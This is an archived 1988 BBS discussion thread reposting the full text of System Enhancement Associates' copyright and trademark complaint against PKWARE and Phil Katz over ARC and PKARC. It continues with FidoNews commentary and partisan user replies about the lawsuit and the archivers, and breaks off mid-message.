+==********** +---------- +Category 11, Topic 9 +Message 1 Sat Jul 09, 1988 +HOMCHICK [Paul] at 21:27 EDT + + (This is the full text of the complaint. It is LONG, about 440 lines). + + Article 13580 of comp.sys.ibm.pc: + From: Robert_A_Freed@cup.portal.com + Newsgroups: comp.sys.ibm.pc + Subject: Re: Phil Katz (PKARC author) sued by SEA (ARC author) + Date: 6 Jul 88 14:59:58 GMT + Organization: The Portal System (TM) + Lines: 448 +, croll, uit or xit ?s + + + Following is the complete text of the verified court complaint + filed by SEA's Thom Henderson (author of ARC) against PKware's + Phil Katz (author of PKXARC and PKARC). I think the importance + of this case and associated issues warrants a net posting of + this length, but my apologies to any who may object. + + ----cut here--------cut here--------cut here--------cut here---- + + + UNITED STATES DISTRICT COURT + FOR THE EASTERN DISTRICT OF WISCONSIN + ____________________________________________________________ + + SYSTEM ENHANCEMENT + ASSOCIATES, INC., + + Plaintiff, + + v. Case No. 88-C-447 + + PKWARE, INC. and + PHILLIP W. KATZ, + + Defendants. + ____________________________________________________________ + + VERIFIED COMPLAINT + ____________________________________________________________ + + Plaintiff, System Enhancement Associates, Inc. + ("SEA"), as and for a complaint alleges as follows: + + THE PARTIES - JURISDICTION AND VENUE + + 1. Plaintiff SYSTEM ENHANCEMENT ASSOCIATES, INC. + hereinafter Plaintiff or SEA, is a corporation of the State + of New Jersey having a place of business at 21 New Street, + Wayne, NJ 07470. Plaintiff is engaged in the business of + developing and licensing others to use computer programs and + software. + + 2. Defendant PKWARE, INC. is a corporation of + the State of Wisconsin. Upon information and belief, Defen- + dants are engaged in the business of licensing others to use + computer programs and software, and do business in the State + of Wisconsin and in this District. Defendants maintain a + place of business at 7032 Ardara Avenue, Glendale, WI 53209. + + 3. Defendant Phillip W. Katz ("Katz"), AKA Phil + Katz, is an officer and a director of Defendant PKWARE. + Defendant Katz resides in the State of Wisconsin and in this + District. All acts by Defendant PKWARE complained of herein + were made with full knowledge and under the specific direction + and control of Defendant Katz. + + 4. This COMPLAINT sets forth causes of action for + copyright infringement under 17 USC 101, et seq and trade- + mark infringement and unfair competition under the Lanham + Act, 15 USC 1051, et seq and under common law. + + 5. This Court has original jurisdiction over the + Copyright and Lanham Act claims pursuant to 28 USC 1338(a) + and, with respect to the Lanham Act claims, additionally + under 15 USC 1121, and over the other claims under the + doctrine of pendant jurisdiction. This Court further has + jurisdiction over the other claims pursuant to both 28 USC + 1338(b), and because this civil action is between citizens + of different States and the matter in controversy exceeds + the sum or value of $10,000, 28 USC 1332(a)(1). + + 6. Venue is proper as to the Defendants pursuant + to 28 USC 1391 generally and as to the copyright infringement + causes of action pursuant to 28 USC 1400(a). + + 7. This Court has jurisdiction over the subject + matter in controversy and the parties to this action. Venue + is proper as to the Defendants, who reside or may be found + in this District. + + COUNT I: COPYRIGHT INFRINGEMENT + + 8. Prior to October 1986, Plaintiff, who was then + and ever since has been a citizen of the United States and + the State of New Jersey, created and wrote an original work, + namely a computer program, entitled "ARC File Archive Utility + Version 5.20", and additionally, prior to April 1987, created + and wrote a revised version of such work, entitled "ARC File + Archive Utility Version 5.21" (hereinafter collectively + referred to as the "ARC programs"). + + 9. Each of the ARC programs contains a large + amount of material wholly original with Plaintiff and is + copyrightable subject matter under the laws of the United + States. + + 10. At all times relevant to this action, Plaintiff + complied in all respects with the Copyright Act of 1976 and + all other laws governing Copyright, and secured the exclusive + rights and privileges in and to the Copyrights to the ARC + programs. + + 11. Plaintiff has received from the Register of + Copyrights Certificates of Registration, dated and identified + as follows: + + a. February 16, 1988, TX2-242-311; and + b. March 30, 1988, TX2-264-701 + + for, respectively, "ARC File Archive Utility Version 5.20" + and "ARC File Archive Utility Version 5.21". + + 12. At all times relevant to this action, Plaintiff + has been and is the sole proprietor of all rights, title and + interest in and to the Copyrights in the ARC programs. + + 13. Each copy of the copyrighted ARC programs + published by Plaintiff and all copies made by Plaintiff or + under its authority had associated therewith a restrictive + license prohibiting copying any ARC programs for purposes of + commercial exploitation. + + 14. After October 1986 and April 1987, Defendants, + jointly and severally, infringed Plaintiff's Copyrights by + publishing, placing on the market and commercially exploiting + works entitled "PKARC FAST! Archive Create/Update Utility + Version 3.5 04-27-87" and "PKXARC FAST! Archive Extract + Utility Version 3.5 04-27-87" (the "infringing works") which + were copied largely from Plaintiff's copyrighted works "ARC + File Utility Version 5.20" and "ARC File Utility Version + 5.21". + + 15. Continuously since about at least as early as + April 27, 1987, Defendants have, to Plaintiff's irreparable + damage, been publishing, licensing and selling, and otherwise + making commercial exploitation of the infringing works, + utilizing the same channels of commerce as Plaintiff, adver- + tising in the same journals (one example of which is hereto + attached as Plaintiff's Exhibit 10) and marketing such + infringing works in the same manner as Plaintiff. + + 16. Defendants' infringing works were published + and commercially exploited without license or authorization + by Plaintiff. + + 17. True copies of Plaintiff's copyrighted works, + and the respective Registrations therefor, are hereto attached + as Plaintiff's Exhibits 1 through 4, respectively. + + 18. Copies of documentation for Defendants' + infringing works are hereto attached as Plaintiff's Exhibits + 5 and 6, respectively. On information and belief, Plaintiff's + Exhibits 5 and 6 are true copies of works of Defendants + published under the authority or license of Defendants, + jointly and severally, for which Defendants bear responsi- + bility. + + 19. Plaintiff, by its Attorney, notified Defendants + that Defendants have infringed and are infringing Plaintiff's + copyrights by a US Postal Service Certified Mail letter dated + December 23, 1987. True copies of said notice letter and + its Return Receipt are hereto attached as Plaintiff's Exhibits + 7 and 8, respectively. + + 20. Defendants, by their Attorneys, responded by + letter, dated January 8, 1988, to Plaintiff's Attorney denying + infringement. A true copy of Defendants' Attorneys' letter + is attached hereto as Plaintiff's Exhibit 9. + + 21. At all times here relevant Defendants were + aware of Plaintiff's copyrights in the ARC programs. + + 22. Notwithstanding knowledge of Plaintiff's + copyrights and specific notice of infringement, Defendants + have continued to infringe Plaintiff's copyrights. + + 23. Defendants did willfully and deliberately + copy Plaintiff's ARC programs and infringe Plaintiff's copy- + rights. + + COUNT II: VIOLATIONS OF THE LANHAM ACT + + 24. Plaintiff repeats and realleges the averments + and allegations contained in numbered paragraphs hereinabove + as though fully set forth here. + + 25. Plaintiff has extensively used and promoted + intrastate and interstate commerce the trademark "ARC" in + connection with computer programs and software. Exemplary + uses of Plaintiff's ARC trademark is shown in Exhibits 1 and + 3. Plaintiff has continuously used its ARC trademark on its + goods shipped throughout the United States and the world. + The ARC trademark has come to be recognized as identifying + Plaintiff as the source of its products and symbolizes + valuable goodwill belonging to Plaintiff. Such recognition + and goodwill arose and accrued prior to the acts complained + of herein. + + 26. Due the very high level of originality and + quality of Plaintiff's File Archive Utility programs, and + their distribution methods and marketing, Plaintiff and its + ARC programs have become recognized as the "standard" in + the personal computer industry. An example of such recognition + is hereto attached as Plaintiff's Exhibit 11. + + 27. Plaintiff has expended significant time and + money in promoting and advertising its File Archive Utility + ARC programs, and the trademark ARC has become associated + with Plaintiff as denoting the source or origin of high + quality File Archive Utility programs. In the personal + computer market and to the users of such computers, the mark + ARC denotes Plaintiff as the source or origin of such + programs. In this regard, an article from Dr. Dobbs Journal, + March 1987, pp 26-28, 30 is hereto attached as Plaintiff's + Exhibit 12. + + 28. Defendants do not have, nor have ever had, any + right or authorization to use Plaintiff's ARC trademark. + + 29. Defendants have prominently used and are using + marks confusingly similar to Plaintiff's ARC trademark, to + wit, PKARC and PKXARC. The infringing marks are shown as + used by Defendant in Plaintiff's Exhibits 5, 6 and 13. + + 30. Defendants have used and continue to use the + marks PKARC and PKXARC in connection with goods functionally + identical to Plaintiff's, in commerce and in the same channels + of trade as Plaintiff's ARC programs. Defendants use such + marks on, and in connection with publishing, distributing, + advertising and marketing throughout the United States, and + in this district, File Archive Utility programs. + + 31. Defendants unauthorized use of PKARC and + PKXARC is likely to cause confusion, or to cause mistake + or to deceive prospective acquirers of such goods into + believing that the products of Defendants originated with or + under the sponsorship or license of Plaintiff. + + 32. Defendants, by improper use of Plaintiff's + trademark ARC, have falsely described or represented the + Defendants' PKARC and PKXARC programs as the goods of + Plaintiff and have, by causing such products to enter into + commerce, created a tendency for such false description or + representation to be understood as having an origin or + sponsorship or license of Plaintiff, thereby diverting income + from Plaintiff to Defendants. Plaintiff has been, is being + and is likely to be damaged by the use by Defendants of the + aforesaid false description or representation. + + 33. Defendant acts are in violation of Section + 43(a) of the Lanham Act, 15 USC 1125(a). + + 34. At all times relevant hereto, Defendants were + aware of Plaintiff's use of the ARC trademark. + + 35. Upon information and belief, Defendants adopted + the PKARC and PKXARC marks to portray to potential consumers + a relationship between Defendant's products and Plaintiff's + products. + + 36. Upon information and belief, all Defendant's + acts complained of herein were done with the intent to cause + confusion among customers as to an affiliation between + Defendants and Plaintiff and to capitalize improperly on the + goodwill accruing to Plaintiff. + + COUNT III: TRADEMARK INFRINGEMENT; UNFAIR COMPETITION + + 37. Plaintiff repeats and realleges the averments + and allegations contained in the numbered paragraphs herein + above as though fully set forth here. + + 38. Defendants are, by the acts complained of + herein, infringing on Plaintiff's trademark rights, and + engaging in unfair trade practices and unfair competition, + all in violation of the common law of the State of Wisconsin. + + COUNT IV: COPYRIGHT INFRINGEMENT AND UNFAIR COMPETITION + + 39. Plaintiff repeats and realleges the averments + and allegations contained in numbered paragraphs hereinabove + as though fully set forth here. + + 40. Defendants have, in addition to the acts as + alleged above, substantially copied and plagiarized the entire + appearance and user interface and screens which result when + a computer user interacts with or uses Plaintiff's ARC + programs and the manner in which the Plaintiff's ARC programs + interface with and interact with the computer user, with the + specific intent to create a belief with the consumer of a + relationship between Defendants' products and Plaintiff's + products. (A copy of Defendants' advertising, PKWARE, INC. + advertisement, PC TECH JOURNAL, October 1987, p 220, is + hereto attached as Plaintiff's Exhibit 14.) + + 41. Defendants' acts as heretofore alleged + constitute infringement of Plaintiff's Copyrights and unfair + trade practices and unfair competition to the irreparable + damage of Plaintiff. + + 42. Defendants' acts, as alleged herein and above, + have been willful and deliberate intending to harm and damage + Plaintiff and its business. + + WHEREFORE PLAINTIFF DEMANDS JUDGMENT AS FOLLOWS: + + (1) Enjoining Defendants, jointly and severally, + and any of their agents, servants or any in active concert + or participation with any of them, temporarily during the + pendency of this action and thereafter permanently from + infringing Plaintiff's copyrights in any manner, and from + publishing, licensing, selling, distributing or marketing or + otherwise disposing of any copies of Defendants' works PKARC + and PKXARC; and from infringing in any manner Plaintiff's + trademark ARC; + + (2) Ordering the Defendants, jointly and severally, + to pay Plaintiff such damages as Plaintiff has sustained in + consequence of Defendants' acts of infringement of Plaintiff's + copyrights, trademark and the unfair trade practices and + unfair competition and to account for: + + (a) all gains, profits and advantages derived + by Defendants and each of them by said trade practices + and unfair competition; and + + (b) all gains, profits and advantages derived + by Defendants and each of them by infringement of + Plaintiff's copyrights or such damages as to the Court + shall appear proper within the provisions of the Copyright + Act of 1976, but not less than the statutory minimums + therein provided; and + + (c) all gains, profits and advantages derived + by Defendants and each of them by infringement of + Plaintiff's trademark or such damages as to the Court + shall appear proper within the provisions of the Lanham + Act; + + (3) Trebling Plaintiff's damages and awarding any + statutory damages at the highest level allowed; + + (4) Ordering Defendants to deliver up to be + impounded during the pendency of this action all copies of + said works entitled PKARC and PKXARC in the possession + or control of Defendants or either of them or any of their + employees, agents, servants, distributors or licensees and + to deliver up for destruction all copies of any infringing + work, as well as all computer media, diskettes, documentation + and any means for making such infringing copies; + + (5) Awarding Plaintiff the costs of this action + and reasonable attorneys' fees against Defendant; + + (6) For such other and further relief as is just. + + + PLAINTIFF'S VERIFICATION: + + Thom L. Henderson understanding that willful false + statements and the like so made are punishable by fine or + imprisonment, or both, under Section 1001 of Title 18 of + the United States Code, declares and affirms: + + That he is President of Plaintiff corporation and is + authorized to execute this instrument on behalf of said + corporation; that he has read and understands the matters + alleged in the Plaintiff's Complaint; and + + That the facts and statements set forth in said + Complaint are, to the best of his knowledge, true; and + all statements made on information and belief are believed + to be true. + + Verified and Dated the 2___ day of April, 1988. + + _____________________________ + Thom L. Henderson + + Attorneys for Plaintiff + SYSTEM ENHANCEMENT ASSOCIATES, INC. + FOLEY & LARDNER + + By: ______________________________ + Michael A. Lechter, Esq. + 777 E. Wisconsin Avenue + Milwaukee, WI 53202 + (414) 289-3599 + + THOMAS M. MARSHALL, ESQ. + Powder Mill Village + 89 Patriots Road + Morris Plains, NJ 07950 + (201) 993-5779 + + + INDEX TO PLAINTIFF' EXHIBITS HERETO ATTACHED + + Complaint Plaintiff's Description + Paragraph Exhibit + Reference Number + + Para. 17, 25 1 "ARC File Archive Utility Version 5.20" + Para. 17 2 Copyright Registration Certificate + dated February 16, 1988; TX2-242-311 + Para. 17, 25 3 "ARC File Archive Utility Version 5.21" + Para. 17 4 Copyright Registration Certificate + dated March 30, 1988; TX2-264-701 + Para. 18, 29 5 "PKARC FAST! Archive Create/Update + Utility Version 3.5 04-27-87", + documentation + Para. 18, 29 6 "PKXARC FAST! Archive Extract Utility + Version 3.5 04-27-87", documentation + Para. 19 7 Notice Letter of December 23, 1987 + addressed to "Phil Katz, PKWARE, INC." + Para. 19 8 US Postal; Service Return Receipt, dated + December 28, 1987, signed by "H. Katz" + Para. 20 9 Attorney Harry Lensky's response letter + dated January 8, 1988 + Para. 15 10 Advertisements of Plaintiff and + Defendants appearing on the same page in + PC TECH JOURNAL, April 1988, p 184 + Para. 26 11 Reprint of Review Article, PC WEEK March + 4, 1986 + Para. 27 12 Dr. Dobbs Journal Article "ARC Wars", + March 1987, pp 26-28, 30 + Para. 29 13 Defendants PKWARE, INC. and Phillip W. + Katz Letter postmarked April 19, 1988, + and its attachments + Para. 40 14 Defendant PKWARE, INC. advertisement in + PC TECH JOURNAL, October 1987, p 220 + + ----cut here--------cut here--------cut here--------cut here---- + + -- Bob Freed INET: Robert_A_Freed@cup.portal.com + UUCP: sun!portal!cup.portal.com!robert_a_freed +---------- +Category 11, Topic 9 +Message 2 Sat Jul 09, 1988 +HOMCHICK [Paul] at 21:31 EDT + + Article 13518 of comp.sys.ibm.pc: + From: tneff@dasys1.UUCP (Tom Neff) + Subject: This damn Katz/SEA/ARC thing + Summary: use Vernware instead + Date: 5 Jul 88 19:46:27 GMT + +The following is my own personal opinion, long and strongly held, pure and +simple. Take it for what it's worth. + +I don't know exactly why SEA sued Phil Katz and I don't care. PKARC has never +had a place on my software shelf and it never will. I keep four files handy: +ARC.EXE, ARCE.COM, ARCA.COM and ARCV.COM. ARC.EXE, by SEAware, is the +standard. I don't use it normally but I keep it around for verification in +case there's a problem with a particular archive's format or contents. If +ARC.EXE won't read it, it doesn't get posted anywhere I control. + +The only problem with ARC.EXE it that it's slow, thanks to the porcine +Computer Innovations C86 runtime library. For high speed performance, I turn +to three superb, tiny support utilities from Vern Buerg and Wayne Chin. ARCV +displays archive directories, ARCE extracts files (to disk or stdout) and ARCA +builds new archives from component files (with optional delete afterwards). +They are all small enough to put in a command cache RAMdisk if you want; they +run ultrafast, reliably, and they never waste your time begging for money or +trumpeting their virtues in big banners. ARCE, in particular, is ideal for +handing out to people with ARC files you distribute -- it's small, the syntax +is self evident, and it does just what you want. Plus there's no embarrassing +panhandling for someone else's bank account to spoil the moment. :-) + +Basically I have never felt that the archiver niche (it doesn't deserve to be +called a "market") has needed a shareware clone. The grapevine word for years +was that Katz asked to see some ASM source in a "friendly" way, then dropped +out of sight and emerged in a couple of months with a beg-ware lookalike. +PKARC has been so assiduously hyped over the past two years that the average +user these days has never heard of ARC.EXE itself, let alone the optimized +Buerg/Chin companion programs. It's a damn shame. Of course, the whole +"squash" incompatibility fiasco was just icing on this particular cake. I +haven't got a clue as to whether there is any merit to SEA's case per se, but +nothing can make Katz a hero. Use the freeware programs and pass them on. +That's my advice. + +PS Vern's ARCE reads squashed archives OK as of version 3.1b, released last +year. If anyone would like a copy let me know, although I suspect I'll be +posting it to c.b.i.pc soon anyway. + +Tom Neff +---------- +Category 11, Topic 9 +Message 3 Sat Jul 09, 1988 +HOMCHICK [Paul] at 21:35 EDT + + Article 13524 of comp.sys.ibm.pc: + From: davidsen@steinmetz.ge.com (William E. Davidsen Jr) + Subject: Lawsuit info + Keywords: SEAware, PKARC, ARC + Date: 5 Jul 88 19:53:08 GMT + Organization: GE Corp. R & D, Schenectady,NY + +I saw this in the FIDO news, and since it gives some hard facts about the case +I included it here by permission. Please don't send me mail about it, I'm not +the author and this is not my opinion, it seems to be some facts, which will +not discourage the people who would rather make up their own + +If anyone cares what I think, I have put a short comment at the end of the +quote. + +================ from FIDO news ================ + +FidoNews 5-27 Page 13 4 Jul 1988 + +SEA vs PKWare -- What's It About? by Ben Baker -- 44/76 + +I suppose most of you know by now know that System Enhancement Associates +(SEA) is suing Phil Katz and PKWare. There has bee a lot of comment (I +hesitate to call it discussion) on the suit in conferences in FidoNet and the +commercial services. Most of what I have read gave me the impression that the +writer thought about it for at least 30 milliseconds, then flamed! So what's +it really about? + +First, a little history. In CP/M days, there were a number of utilities for +compressing and decompressing files, based on the Huffman coding technique. +The most popular were called SQ and USQ, but there were several variations. +There was at least one utility called LIB, which did not do compression +(remember the total memory space was only 64K, and CP/M used at least 4K of +that), but it did collect files, "squeezed" or otherwise, into a single file +so that they could be treated as a unit. + +When MS-DOS came along, many of the old CP/M utilities were ported. Among +them were several (often incompatible) variations of SQ/USQ. Our own Tom +Jennings ported LIB to DOS. DOS BBS operators then had all the functionality +they had in CP/M; they could compress files, and they could pack them into +"library" files, in separate steps of course. But DOS wasn't memory poor like +CP/M. The climate was right for something "new." Enter Thom Henderson. + +Henderson, one of SEA's principals, borrowing from concepts developed by Brian +Kernigan, wrote a "library" utility which overcame a limitation of LIB by +using a distributed directory instead of a fixed-length directory at the front +of the file. It also had built-in Huffman code compression, eliminating the +need for SQ/USQ. He called it ARC. Almost overnight, it became a standard +among bulletin board operators. + +As ARC developed, it acquired a number of useful features, encryption and LZ +compression, for example, stirring interest in the commercial marketplace. +Thus ARC became one of those products marketed both commercially and as +shareware. + +In an effort to encourage porting ARC to other systems such as Unix, SEA made +the sources for ARC available for download on its bulletin board. These files +bear the SEA copyright notice, and before people may legally do anything with +them other than study them, they need SEA's permission. When someone asks +permission to port, it is granted with three restrictions on the resulting +program: it may not be sold, it may not be used commercially and a copy must +be submitted to SEA for redistribution (under the same restrictions). Someone +may also use the sources in a commercial product, but in this case, a source +license fee is charged and the resulting program may NOT be a general purpose +file-archiving utility. + +FidoNews 5-27 Page 14 4 Jul 1988 + +A short time later PKXARC appeared on the scene, followed quickly by PKARC. +Katz hadn't followed the rules, but then, ARC wasn't making anybody rich as +shareware, and Katz wasn't addressing the much more lucrative commercial +market SEA had developed for ARC, so SEA overlooked it. Then, last year, an +ad for PKARC and PKXARC appeared in "PC Tech Journal" on the page facing SEA's +ad for ARC. Katz' ad priced the product a dollar and a half less than ARC, +and even went so far as to make comparisons to "the other archive utility." + +SEA then sent a "cease and desist" letter to PKWare, proposing the following +agreement: PKWare would withdraw all commercial advertising and cease attempts +at commercial distribution, and SEA would forgive past violations and grant +PKWare an unlimited cost-free license to market its derivative products as +shareware with a non-commercial restriction. Katz refused. + +I suspect, though I don't know, that there were additional exchanges between +SEA and PKWare. Were it me, I would have demanded a source license fee and +royalties on sales to date. In any event, no agreement was reached, so SEA +filed suit. + +As I understand it, there are four counts in the complaint (not necessarily in +this order): 1) "look-and-feel" violation, 2) copyright violation, 3) +trademark violation, and 4) unfair trade practice. Let's look at them one at +a time. + +I placed "look-and-feel" first because it's fairly easy to dismiss. I +personally don't think SEA has a prayer on this one. "Look-and-feel" is the +current legal buzz-word so SEA's lawyer tossed it in, but I can't imagine it +applying in this case. + +A concept or idea cannot be copyrighted, but the expression of a concept or +idea sure can, and a program is the expression of one or more concepts or +ideas. If the development of PKXARC and PKARC were entirely independent of +ARC, merely employing the concepts used there, then the second count cannot be +sustained. If it can be shown that Katz obtained or had access to the sources +for ARC, then he probably infringed on SEA's copyright. If it can be shown +that he actually used them in developing his programs, then he IS guilty of +copyright infringement. Even if he translated them to assembly language, he +violated the copyright. Translating a novel from English to German without +the permission of the author and/or publisher is prohibited by copyright laws +world-wide. Same principle. + +Is ARC a trademark? As relating to archiving or compression utilities, you +bet. Does the name "PKARC" violate that trademark? Suppose I developed a new +soft drink and began marketing it under the name "BBCOKE." How quickly would I +find myself in court? And isn't there a network developer using the name +"ARC," and are they in jeopardy? No! If I were a fuel dealer, I could sell +all the "Coke" (a coal derivative) I wanted and the Coca Cola Co. couldn't +care less. This one will be tough for Katz to beat. + +FidoNews 5-27 Page 15 4 Jul 1988 + +Why is a trademark important, anyway? A company spends considerable effort, +not to mention money, establishing a trademark. I mentioned Coke in the +previous paragraph. Did anyone have any doubt what company I was referring +to? This is called "product recognition" and it is an extremely valuable +asset. SEA has it with "ARC," but that didn't just happen. They worked at +it. My "BBCOKE" would be trading on product recognition it didn't earn on its +own. If I then sought out advertisements for Coca Cola, and placed ads of my +own, claiming (whether right or not) "BBCOKE is better than the other cola" +next to all I could find, would I be engaging in fair trade? Do you think I +could argue that I was not trying to deliberately undermine the effect of +their advertising and take advantage of their recognition? Do you suppose +that Coca Cola would give me the courtesy of a letter before they fell on me +like a ton of bricks? If any of the first three counts can be sustained, then +the fourth probably should be also. + +A recent "PC Week" article has caused considerable comment on this issue. One +mentioned a "fact" cited in the article that PKWare was a four-employee +company operating out of Katz' home, and implied this was a Goliath attacking +a David. The "facts" may or may not be true. The article was so badly +written and so poorly researched as to call into question all of its "facts." +The fact is that SEA is a four-employee (counting the principals) company. +The Wayne (not Fort Wayne) NJ corporate address is Andy Foray's home. These +are TWO small companies. Neither has the resources to pursue a protracted +legal battle. I think we can expect a reasonably quick resolution. + +So how does it all affect you? Will you still be allowed to use a Unix port +of ARC? Of course. Most ports have been made with permission, and even those +which have not are not encroaching on SEA's commercial market. Will you still +be able to use PKARC or PKXARC copies you obtained through shareware? You did +so in good faith and SEA has neither the resources nor the inclination to +search you out and persecute you. In fact, should Katz lose the suit, he +might still be granted a license to market his programs as shareware. For +that, we'll have to await the final resolution. SEA is NOT being vindictive. +They are trying to protect what they regard as a valuable commercial asset. + +If you are a shareware software developer, as I am, it may affect you in a +different way. The lawyers have been telling us for several years that the +copyright laws do in fact protect products marketed as "shareware." But so +far, no court has said so, and the courts of the land are the final arbiters +of the law. A win for SEA, particularly on the second count above, would +place all, big or small, on notice! Shareware is NOT public domain! A win +for Katz, on the other hand, is a signal to shareware authors, and a source of +inexpensive, quality software might well dry up. If that happened, it would +hurt developers and users alike. Think about it. + +================ end quote ================ + +I take issue with one conclusion of the author... if there is any validity to +any look and feel suit, this is it. While the zoo and dwc archivers have +different help and directory screens, PKARC seems to have copied those screens +directly from ARC. + +I wonder when one of these programs will switch to 16 bit compression and just +say "if you want to run this get 512k on your box." There are a lot of +programs which need it now, and staying with the restrictions of the original +256k PC is pretty pointless. + +bill davidsen +---------- +Category 11, Topic 9 +Message 4 Sat Jul 09, 1988 +MDEVORE [Michael] at 21:00 CDT + +Tom Neff lives! I don't know who is harder to get ahold of, him or Rahul. +They both dropped out of sight at the same time and both have resisted any of +my efforts to contact them. You don't suppose do you...? No, couldn't be. +Still, has anyone seen Tom and Rahul in the same room? I think they might be +the same person. + +As to SEA and PKWARE, I say let them both rot in a pit -- a fate they fully +deserve. PKWARE for various activities already outlined. SEA for not +upgrading a piece of software to keep up with the times. Its glacial slowness +stopped being excusable a couple of years ago. SEA has effectively abandoned +their users (an argument that has been advanced by some as a possible legal +point in favor of PK). Further, Mr Henderson has proved to be unmatchable in +his rudeness towards people trying to port ARC to OS/2. Now, he brings +another stupid look-and-feel lawsuit into the computer arena, as if we didn't +have way too many already. + +No sympathy here for either. I am quickly moving towards being a ZOO convert, +but unfortunately realities are realities and I must continue uploading and +downloading .ARC files if I want to access very many files, or want my files +to be accessed very much. Too bad. Let's hope we can look forward to a +future of ZOO soon. + +---------- +Category 11, Topic 9 +Message 5 Sat Jul 09, 1988 +BH01 at 23:28 EDT + +I notice that my article in Dr. Dobbs is included in the Exhibits, as I +suppose it should. -russ +---------- +Category 11, Topic 9 +Message 6 Sun Jul 10, 1988 +J.JIMENEZ at 01:47 EDT + +Mike, you have no idea what you are talking about, as you obviously do not +know Thom. I do, personally. Thom is NOT a vindictive person, and he certainly +has not "abandoned" his users. "Glacial slowness"? Thom has upgraded ARC +regularly over the last four years, and he IS extremely responsive to +suggestions and bug reports. If you have a specific feature you would like to +see added to ARC, I suggest you write a letter and tell him so. I can +guarantee that you will receive an answer. + +I'm going to speak about most of the points here. + +1) ARC being slow - ARC is slow because the techniques ARC uses to access +files are GUARANTEED to be compatible with 99% of MS- and PC-DOS machines. +Last I heard, ARC is developed entirely on a PC/XT machine, not due to +masochism, but to ensure that it is as compatible as possible across the +board. Thom and Andy are probably doing compiles and editing on a 386 machine +now, but I KNOW that ARC is still tested on XT machines as the final go-ahead +test. + +2) The suit - If Thom decided to file suite against PKWARE, it's because he +has exhausted every other means of trying to protect what he feels are his +rights. Thom happens to be a very modest and private person. He does not like +to be in the limelight, though he enjoys interacting with people through +electronic means, and he is a VERY good moderator and general organizer. A lot +of what FidoNet is and isn't today is a result of a lot of hard work from +Thom's part. If he finally decided to file suit, it's because he got tired of +trying to reason with Phil. I'm not surprised. Squash mode is, in my opinion, +a good example of what kind of person Mr. Katz must be. + +3) Source code - I feel Thom did not do the right thing by releasing the +source to ARC to the general public. It was a virtual invitation for something +like this to happen. However, the source is well- marked as a copyrighted +work, and anyone that tells me that PKARC did not come from ARC's source has +no idea what they are talking about. I agree with Ben Baker (whom I also know +personally) that the look-and-feel issue is a moot one, it's just a catchy +phrase that computer law lawyers like to use know. ARC's user interface is so +generically text oriented that I don't think there's much there that Thom can +claim rights to. However, everything else in the suit make a heck of a lot of +sense to me. + +4) Clones of ARC - One of the reasons that I suspect Thom had in mind when he +released the source to ARC is to deal with the many people who were asking SEA +to port ARC to other machines. Rather than expend a ton of work for machines +Thom and Andy had no experience with, they released the source and gave people +opportunities to make "clones" of the standard for other machines under VERY +explicit and clear-cut conditions. I think this is an excellent example of the +kind of person Thom is. + +5) ARC performance revisited - ARC gives users a very easy way to speed up the +program tenfold or more. You set an environment variable, ARCTEMP I believe, +to whatever disk drive you want ARC to use for temp files it creates. You can +also specify a path. Simple, set ARCTMP to a ram disk, and it easily matches +PKARC in performance. This is in the documentation, I find it hard to believe +that not many people are aware of this. + +6) As it relates to ZOO - I think ZOO is an excellent program and a viable +alternative to ARC. Many BBS' and other systems use ZOO exclusively. When I +first saw Zoo, I converted all 1000+ files on my old BBS in California to ZOO. +Unfortunately, I lost all my files to a magnetic scan machine at an airport, +and eventually converted back to ARC. I don't think this suit has anything to +do with Zoo. + +7) Impact on Shareware - I hope Thom wins his suit. Any shareware developers +reading this cannot help but think how good it will be for all of us to +finally get some recognition from the courts for our work. Our software might +actually get some badly-needed legal recognition and protection. + +I welcome any comments and rebuttals. + +Juan +---------- +Category 11, Topic 9 +Message 7 Sat Jul 09, 1988 +B.K.BARRETT at 23:01 PDT + + I disagree. I think Phil took the ARC idea to its logical conclusion, and it +deserves to live. PKARC is faster, cleaner, and in my opinion a far superior +product. If Thom couldn't go that extra step that Phil took, he shouldn't go +crying to the courts. +---------- +Category 11, Topic 9 +Message 8 Sun Jul 10, 1988 +MDEVORE [Michael] at 01:31 CDT + +Juan, I have *every* idea about what I am talking about. I know people who +know and have dealt with Mr. Henderson. I also like to point out that I don't +have to agree with you to know what I'm talking about. (Yeah, I'm mad, but +I'll get over it). + +Thom HAS absolutely 100% been quoted as saying extremely rude things to one +person who was interested in a port of ARC to OS/2. Several other foolish +remarks were made at the time too. + +I can't believe that you think ARC has been supported in the slightest. ALL +of his idiotic so-called "upgrades" were minor for the past many months. The +man obviously has *NO* idea of how to make a program competitive. The world +has been crying for a better version of ARC for a long time. PK did it. +Build a better mousetrap.... + +Market tells all. PKARC is already replacing ARC in most BBS's as the +preferred way to go. You can rail all you want about ARC really being pretty +fast if you do this, that, or the other thing and it being well-supported. +Fact is, the people have chosen: for greatly superior performance. Just ask +about anyone who use PKARC why. + +Surprise, ZOO is 100% compatible with MS-DOS generic machines too. And guess +what? It's about 5x faster too. Thom certainly can't hide behind +compatibility as some poor excuse for slowness. ARC is slow because either 1) +he used a very very poor language to write it in, or 2) he can't program very +well. I'll be kind and assume #1. That still means that Mr. Henderson has no +concept of what a modern language can do and is completely out of touch with +what tools a professional should be using. Still kind of makes him +incompetent in one way or another. + +I've heard that a lot of Fido people are quite displeased with Mr. Henderson +as well. Since that's a third-party comment, I can't really say whether it's +true or not. But the comment was publicly made by someone who generally knows +what he is talking about. Maybe someone else can give the scoop. Yes, I know +that you're a Fido person. However, you don't represent all Fido people. + +I'll will in no fashion defend Phil Katz. I think, well, I won't say what I +think since it could lead to a libel suit if he ever saw my opinion. Suffice +to say that I'll *NEVER* support PK, or his wares. Enough has been said here +about the sordid history of PKARC. I'd support Thom over Phil if it came to +that, god forbid. Maybe that'll make you fractionally happier. + +I think this lawsuit has everything to do with ZOO. Hopefully enough people +will be sick enough of the two parties that they'll abandon ARC all together +and move towards the future. ZOO's expansion capabilities provide a future. +ARC's doesn't. One can only hope that this lawsuit will provide the impetus. + +I hope that both parties drag on in this lawsuit soooo long that they go +bankrupt. Serve them both right. I can actually see some good coming from +this lawsuit if that happens. + +If Thom wins his suit, basically what will occur is that shareware authors +will be more legally protected from their own incompetence. If Phil wins the +suit, shareware authors will be more legally open to predation of their works. +Lose-lose. Please, powers-that-be if you're listening, let this suit take a +loooong time to resolve. + +---------- +Category 11, Topic 9 +Message 9 Sun Jul 10, 1988 +STROM [Charlie] at 08:09 EDT + +First a couple of minor historical corrections - the first library utility was +written by our own Gary Novosielski for CP/M. It was called LU, not LIB. Paul +Homchick first ported LU over to a 16-bit processor, running CP/M-86 (actually +MP/M-86). + +Now, on to a strange conclusion I have seen in a couple 